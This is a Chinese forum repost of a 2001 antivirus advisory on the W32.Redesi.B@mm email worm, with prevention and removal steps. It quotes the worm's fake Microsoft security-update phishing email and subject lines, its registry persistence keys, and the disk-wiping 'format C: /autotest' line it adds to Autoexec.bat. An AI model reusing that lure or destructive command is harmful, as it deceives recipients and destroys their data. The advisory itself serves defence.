发信人: emil(稻草人)
整理人: emil(2001-10-23 10:32:18), 站内信件
|
W32.Redesi.B@mm
病毒名称:W32.Redesi.B@mm
别名: Win32.Rede.A@mm, W32/Redesi.b@MM
危险等级:低
发现时间:2001/10/18
长度: 12,288字节
发作时间:无
感染症状:大量发送电子邮件
发作症状:格式化C盘
病毒类型:邮件病毒
操作平台:Windows 32位操作平台
感染对象:无
传播途径:电子邮件
病毒介绍:
W32.Redesi.B@mm病毒是一个通过电子邮件传播的病毒,在2001年11月11日,病毒就会修改Autoexec.bat文件格式化C盘。
它发送的电子邮件格式如下:
标题是以下其中一个:
FW: Security Update by Microsoft.
FW: Microsoft security update.
FW: IT departments on state of HIGH ALERT.
FW: Important news from Microsoft.
FW: Stop terrorists computer viruses reign.
FW: Terrorists release computer virus.
FW: Emergency response from Microsoft Corp.
FW: Terrorist Emergency. Latest virus can wipe disk in minutes.
FW: Microsoft Update. Final Release Candidate.
FW: New computer virus.
内容:
Just recieved this in my email
I have contacted Microsoft and they say it's real !
-----Original Message-----
From: Microsoft Support Desk [mailto:[email protected]]
Sent: 17 October 2001 15:21
Subject: Security Update
Due to the recent spate of email spread computer viruses
Microsoft Corp has released a security patch.
Please apply the attached file to your Windows computer
to stop any futher spread or these malicious programs.
Regards
Microsoft Support
附件:
Common.exe
Rede.exe
Si.exe
UserConf.exe
disk.exe
如果运行该附件,病毒就会显示如下信息框:
并将自身拷贝为以下隐藏的文件:
C:\Common.exe
C:\Rede.exe
C:\Si.exe
C:\UserConf.exe
C:\disk.exe
然后它就向Outlook里面所有的收件人发送带毒的电子邮件,并在注册表中添加以下注册信息:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Rede="C:\rede.exe"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ErrorHandling\
Rede="True"
在2001年11月11日,病毒就会修改Autoexec.bat文件格式化C盘,在文件中加入以下命令语句:
ECHO Bide ye the Wiccan laws ye must, In perfect love and perfect trust.
format C: /autotest
在病毒程序中还包含以下字符串:
When misfortune is enow, wear the blue star on thy brow.
True in love ye must ever be, lest thy love be false to thee.
These words the Wiccan Rede fulfill: An ye harm none, do what ye will.
Rede(c)Si 2001 ... heh, want my phone number too ?!?
Sick of all thes 3rd world gits spreading worms. Time for a bit of Welsh stuff :)
预防方法:
1、通过设置,拒收以下标题的电子邮件:
FW: Security Update by Microsoft.
FW: Microsoft security update.
FW: IT departments on state of HIGH ALERT.
FW: Important news from Microsoft.
FW: Stop terrorists computer viruses reign.
FW: Terrorists release computer virus.
FW: Emergency response from Microsoft Corp.
FW: Terrorist Emergency. Latest virus can wipe disk in minutes.
FW: Microsoft Update. Final Release Candidate.
FW: New computer virus.
2、在C盘根目录下创建以下名称的空目录(注意:是空目录),防止病毒生成这些文件:
Common.exe
Rede.exe
Si.exe
UserConf.exe
disk.exe
应急清除方法:
1、删除带毒的电子邮件;
2、删除病毒在C盘根目录下生成的文件,注意:这些文件都是隐藏的。
3、将病毒修改的注册表修复:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Rede="C:\rede.exe"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ErrorHandling\
Rede="True"
4、运行sysedit.exe编辑autoexec.bat,删除
ECHO Bide ye the Wiccan laws ye must, In perfect love and perfect trust.
format C: /autotest
---- 欢迎光临聊毒斋!!!
http://cnav.cn99.com or http://cnav.6to23.com
Email: [email protected]
Oicq:201604 |
|